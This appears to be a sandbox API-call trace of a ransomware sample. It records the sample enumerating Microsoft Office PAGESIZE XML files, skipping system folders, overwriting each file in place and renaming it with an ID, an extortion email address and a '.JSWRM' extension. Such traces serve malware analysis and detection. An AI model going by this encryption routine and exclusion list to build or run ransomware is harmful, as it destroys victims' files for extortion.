[0139.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN103.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn103.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.364] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=56844) returned 1 [0139.364] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.364] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xde00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xde00, lpOverlapped=0x0) returned 1 [0139.369] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.369] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xde00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xde00, lpOverlapped=0x0) returned 1 [0139.369] CloseHandle (hObject=0x238) returned 1 [0139.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN103.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn103.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN103.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn103.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.370] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb66, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN105.XML", cAlternateFileName="")) returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2=".") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="..") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="...") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="windows") returned -1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="recovery") returned -1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="perflogs") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="documents and settings") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="system volume information") returned -1 [0139.370] lstrcmpiW (lpString1="PGMN105.XML", lpString2="msocache") returned 1 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN105.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN105.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN105.XML", lpUsedDefaultChar=0x0) returned 11 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN105.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN105.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN105.XML", lpUsedDefaultChar=0x0) returned 11 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN105.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn105.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.371] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2918) returned 1 [0139.371] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.371] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb60, lpOverlapped=0x0) returned 1 [0139.373] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.373] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb60, lpOverlapped=0x0) returned 1 [0139.373] CloseHandle (hObject=0x238) returned 1 [0139.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN105.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn105.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN105.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn105.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.374] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d791bfc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN107.XML", cAlternateFileName="")) returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2=".") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="..") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="...") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="windows") returned -1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="recovery") returned -1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="perflogs") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="documents and settings") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="system volume information") returned -1 [0139.374] lstrcmpiW (lpString1="PGMN107.XML", lpString2="msocache") returned 1 [0139.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN107.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN107.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN107.XML", lpUsedDefaultChar=0x0) returned 11 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN107.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN107.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN107.XML", lpUsedDefaultChar=0x0) returned 11 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN107.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn107.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.402] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2652) returned 1 [0139.402] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.402] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0139.403] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.403] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0139.403] CloseHandle (hObject=0x238) returned 1 [0139.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN107.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn107.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN107.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn107.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.405] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34d8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN108.XML", cAlternateFileName="")) returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2=".") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="..") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="...") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="windows") returned -1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="recovery") returned -1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="perflogs") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="documents and settings") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="system volume information") returned -1 [0139.405] lstrcmpiW (lpString1="PGMN108.XML", lpString2="msocache") returned 1 [0139.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN108.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN108.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN108.XML", lpUsedDefaultChar=0x0) returned 11 [0139.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN108.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN108.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN108.XML", lpUsedDefaultChar=0x0) returned 11 [0139.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN108.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn108.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.407] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13528) returned 1 [0139.407] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.407] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x34d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x34d0, lpOverlapped=0x0) returned 1 [0139.409] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.409] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x34d0, lpOverlapped=0x0) returned 1 [0139.409] CloseHandle (hObject=0x238) returned 1 [0139.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN108.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn108.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN108.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn108.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.411] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1aa2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN109.XML", cAlternateFileName="")) returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2=".") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="..") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="...") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="windows") returned -1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="recovery") returned -1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="perflogs") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="documents and settings") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="system volume information") returned -1 [0139.411] lstrcmpiW (lpString1="PGMN109.XML", lpString2="msocache") returned 1 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN109.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN109.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN109.XML", lpUsedDefaultChar=0x0) returned 11 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN109.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN109.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN109.XML", lpUsedDefaultChar=0x0) returned 11 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN109.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn109.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.412] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6818) returned 1 [0139.412] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.412] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1aa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1aa0, lpOverlapped=0x0) returned 1 [0139.414] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.414] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1aa0, lpOverlapped=0x0) returned 1 [0139.414] CloseHandle (hObject=0x238) returned 1 [0139.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN109.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn109.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN109.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn109.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.415] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d76b9e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d76b9e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcae0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN110.XML", cAlternateFileName="")) returned 1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2=".") returned 1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2="..") returned 1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2="...") returned 1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2="windows") returned -1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2="recovery") returned -1 [0139.415] lstrcmpiW (lpString1="PGMN110.XML", lpString2="perflogs") returned 1 [0139.416] lstrcmpiW (lpString1="PGMN110.XML", lpString2="documents and settings") returned 1 [0139.416] lstrcmpiW (lpString1="PGMN110.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.416] lstrcmpiW (lpString1="PGMN110.XML", lpString2="system volume information") returned -1 [0139.416] lstrcmpiW (lpString1="PGMN110.XML", lpString2="msocache") returned 1 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN110.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN110.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN110.XML", lpUsedDefaultChar=0x0) returned 11 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN110.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN110.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN110.XML", lpUsedDefaultChar=0x0) returned 11 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN110.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn110.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.417] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51936) returned 1 [0139.417] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.417] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xcae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xcae0, lpOverlapped=0x0) returned 1 [0139.421] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.421] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xcae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xcae0, lpOverlapped=0x0) returned 1 [0139.421] CloseHandle (hObject=0x238) returned 1 [0139.421] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN110.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn110.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN110.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 